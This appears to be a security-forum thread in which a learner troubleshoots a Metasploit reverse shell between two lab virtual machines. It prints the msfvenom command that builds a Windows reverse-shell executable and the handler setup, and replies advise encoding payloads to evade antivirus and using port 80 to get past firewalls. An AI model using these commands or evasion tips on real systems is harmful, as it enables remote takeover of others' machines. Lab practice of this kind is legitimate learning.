user0001

First windows/shell/reverse_tcp stuck

6 posts in this topic

This is my first reverse shell. I used

msfvenom -p windows/shell/reverse_tcp LHOST=mykalivmip LPORT=4444 -f exe > evil.exe

I copy the evil.exe file over to windows 7 vm. Then I go back to metasploit and type

use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lport 4444
set lhost mykalivmip
exploit

I also tried 

set END SESSION ON START=false

right before exploit and that didn't work either. I am using VirtualBox version 5.0.20 kalivm 32bit and windowsvm 32bit with host Ubuntu. I also tried a similar windows meterpreter reverse tcp and get the same thing. This is what shows after exploit. I also double click the evil.exe file in windows after exploit and get this

[*] Started reverse TCP handler on mykalivmip:4444 
[*] Starting the payload handler...

It just gets stuck on this.

Edited by user0001

Looks like possible Windows firewall? I'd run Wireshark or even Microsoft's old packet analyzer that has the ability to watch network traffic by application or PID. Then see what's going wrong.

Go into Windows firewall and make sure the reversed host is allowed outbound connections from the application. I'd set it as a trusted host. If you look at some back posts, a very savvy binrev member (I think his handle was something like Aghaster) did some research on circumventing Windows Firewall for his custom key logger. That is if Windows firewall is in fact the problem. But that's where I'd look here. :-)

I am assuming networking between each host has been confirmed as working.

Edited by tekio
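
To check whether Windows Firewall is in fact the problem, its own log can be read instead of guessing. The following is an added example, not part of the original posts: it parses text in the pfirewall.log layout and counts the firewall's verdicts for TCP traffic to one destination port. It assumes dropped-packet logging has been enabled on the Windows VM; the sample lines, dates and 192.0.2.x addresses are constructed.

```python
"""Summarise Windows Firewall log entries for one TCP port (added example)."""
from collections import Counter

# Constructed sample in the pfirewall.log layout; the addresses are placeholders.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path

2016-05-20 10:15:02 DROP TCP 192.0.2.15 192.0.2.4 49170 4444 52 S 3412 0 8192 - - - SEND
2016-05-20 10:15:05 DROP TCP 192.0.2.15 192.0.2.4 49170 4444 52 S 3412 0 8192 - - - SEND
2016-05-20 10:15:09 ALLOW TCP 192.0.2.15 192.0.2.4 49171 80 0 - 0 0 0 - - - SEND
2016-05-20 10:15:11 ALLOW UDP 192.0.2.15 192.0.2.1 53211 53 0 - 0 0 0 - - - SEND
"""


def parse_firewall_log(text):
    """Yield one dict per entry, keyed by the names in the '#Fields:' header."""
    fields = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))


def tcp_port_verdicts(text, port):
    """Count (action, path, dst-ip) for TCP entries whose destination port matches."""
    counts = Counter()
    for entry in parse_firewall_log(text):
        if entry["protocol"] == "TCP" and entry["dst-port"] == str(port):
            counts[(entry["action"], entry.get("path", "-"), entry["dst-ip"])] += 1
    return counts


if __name__ == "__main__":
    # Repeated DROP/SEND rows for the handler port mean the firewall blocked the
    # outbound connection; no rows at all mean the traffic never reached it.
    for (action, path, dst), n in tcp_port_verdicts(SAMPLE_LOG, 4444).items():
        print(f"{action:5} {path:7} -> {dst}:4444  x{n}")
```

If the port shows only ALLOW rows, or none, the firewall is not what stops the connection and the cause lies elsewhere, for example VM networking or antivirus.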

Ok, I know this is going to sound stupid but...

Did you actually run it? If you did, then it probably could be what tekio said: your firewall could be blocking the outgoing connection. It also might be your antivirus. It doesn't look like you encoded the payload, so if you have antivirus, when you upload the payload to the system and try to run it the antivirus will scan the program and work out it's a malicious file, then quarantine and/or delete it.

Try setting the port for the TCP reverse shell to 80 (HTTP) or using an actual HTTP-specific payload.

Port 80 is usually not blocked by your firewall so all traffic on port 80 is just allowed to go through. This is because port 80 is the port web traffic travels on and we can't go around blocking all our web traffic, can we? If you want, just disable your firewall. When it comes to antivirus you need to encode your payload, which you can do with msfvenom. Encoding a payload makes it harder for antivirus to detect. TBH I can't be fucked looking up the syntax in msfvenom on how to do this so just look up how to encode a payload in msfvenom and you should be fine. Of course this is not guaranteed to work. It might be best just to disable your antivirus altogether if you're just learning.

If you are interested in this stuff I'd recommend you read "Penetration testing: a hands-on introduction to hacking". I read it and it's where most of my computer hacking knowledge comes from. Granted, it will not give you enough background to go out and hack highly secured environments. In order to be a real hacker you need to know more than just how to use some tools, you need to know how computers actually work.

Anyways best of luck to you :)

Here is the book https://repo.zenk-security.com/Magazine E-book/Penetration Testing - A hands-on introduction to Hacking.pdf

Regards,

ReAiFi

Edited by scratchytcarrier
too bad it's not where your knowledge of capitalization and punctuation could've also come from.

Quote

In order to be a real hacker you need to know more than just how to use some tools, you need to know how computers actually work.


In order to be a "real hacker" (whatever the fuck that means) you need to have more than knowledge of how computers work, you need to have the will to experiment, make mistakes, learn from them, try things and work them out, first and foremost. The rest will eventually fall into place on its own.

Quote

In order to be a real hacker you need to know more than just how to use some tools, you need to know how computers actually work.

A noob could spend 10-15 years in sheer frustration, if they start out with coding exploits from scratch. :-P
